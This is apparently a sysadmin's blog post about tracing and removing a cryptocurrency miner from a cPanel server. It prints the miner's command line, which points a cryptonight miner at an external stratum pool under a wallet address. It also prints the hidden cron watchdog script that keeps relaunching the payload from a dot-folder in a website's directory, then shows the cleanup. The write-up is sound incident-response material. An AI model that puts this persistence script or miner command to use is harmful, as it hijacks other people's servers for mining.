Cpanel server infected with mining software

Recently one of server under my control infected with mining software. It cause unnecessary load and waste of server resource.

Since the server is using Cpanel, I must use WHM to track down the source. I check WHM ‘Process Manager’ and ‘Daily process log’ and found something similar like :

impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x

Using ‘Process Manager’ to kill the pid who is running the process.

I have check in the user Cpanel and found strange cronjob point to strange path eg :

/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd

So I read the content of the file using cat command:

[[email protected] ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null

Go to the folder contents and see what is inside the folder:

[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[[email protected] .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x

The existence of bash.pid confirm that the mining come from that path.

Delete the folder and delete the cronjob so the mining stop.

[[email protected] .qts]# cd ..
[[email protected] includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’